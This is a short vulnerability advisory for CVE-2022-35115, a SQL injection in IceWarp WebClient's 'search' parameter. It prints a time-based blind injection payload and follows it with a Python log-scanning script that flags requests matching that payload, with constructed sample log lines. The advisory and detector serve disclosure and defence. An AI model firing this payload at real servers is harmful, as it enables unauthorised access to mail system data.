Headline
CVE-2022-35115
IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.
[+] Title: IceWarp WebClient
[+] Author: veyselxan
[+] Vendor Homepage: https://www.icewarp.com/
[+] Tested on: Windows 10
[+] Versions: 13.0.2.9
[+] Fix version: DC2 - Update 2 Build 10 (13.0.2.10)
[+] Vulnerability Type: SQL injection
[+] Vulnerable Parameter: "search"
[+] Vulnerable File: webmail/server/webmail.php
[+] CVE: CVE-2022-35115
[+] Video POC: https://youtu.be/E04ZuqISASQ
[+] Exploit: INJECTION_CODE_POC’) AND (SELECT 9056 FROM (SELECT(SLEEP(5)))Ouc0) AND ('bvsb’=bvsb
[+] Payload: 240
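For triage on hosts that ran 13.0.2.9, the following added example (not part of the original advisory or of IceWarp's code) scans web access logs for requests to the vulnerable file whose search parameter has the shape of the time-based payload above. It assumes combined-format access logs and that the parameter is visible in the query string, which the advisory does not state; the rule names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/webmail/server/webmail.php"   # vulnerable file named in the advisory
PARAM = "search"                           # vulnerable parameter named in the advisory

# Heuristic rules (assumed, not vendor signatures) modelled on the advisory's payload.
RULES = {
    "quote_breakout": re.compile(r"['\u2019]\s*\)\s*(?:and|or)\b", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "delay_call": re.compile(r"\bsleep\s*\(", re.I),
}

# Combined log format: ip, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_search(target):
    """Return the names of rules matched by the decoded 'search' value, or []."""
    parts = urlsplit(target)
    if parts.path.lower() != ENDPOINT:
        return []
    hits = []
    # parse_qs percent-decodes and turns '+' into spaces before matching.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        hits += [n for n, rx in RULES.items() if rx.search(value) and n not in hits]
    return hits

def scan(lines):
    """Return (client_ip, timestamp, matched_rules) for each flagged log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := suspicious_search(m["target"])):
            findings.append((m["ip"], m["ts"], hits))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jul/2022:10:14:55 +0000] "GET /webmail/server/webmail.php?search=invoice+2022 HTTP/1.1" 200 812',
    '192.0.2.11 - - [12/Jul/2022:10:14:58 +0000] "GET /webmail/server/webmail.php?search=select+committee+(draft) HTTP/1.1" 200 640',
    '198.51.100.23 - - [12/Jul/2022:10:15:02 +0000] "GET /webmail/server/webmail.php?search=x%27)+AND+(SELECT+9056+FROM+(SELECT(SLEEP(5)))Ouc0)+AND+(%27bvsb%27=%27bvsb HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, ts, hits in scan(SAMPLE_LOG):
        print(ip, ts, ",".join(hits))
```

If the server logs only the path, apply the same rules to the request body captured by a reverse proxy or WAF instead of the query string.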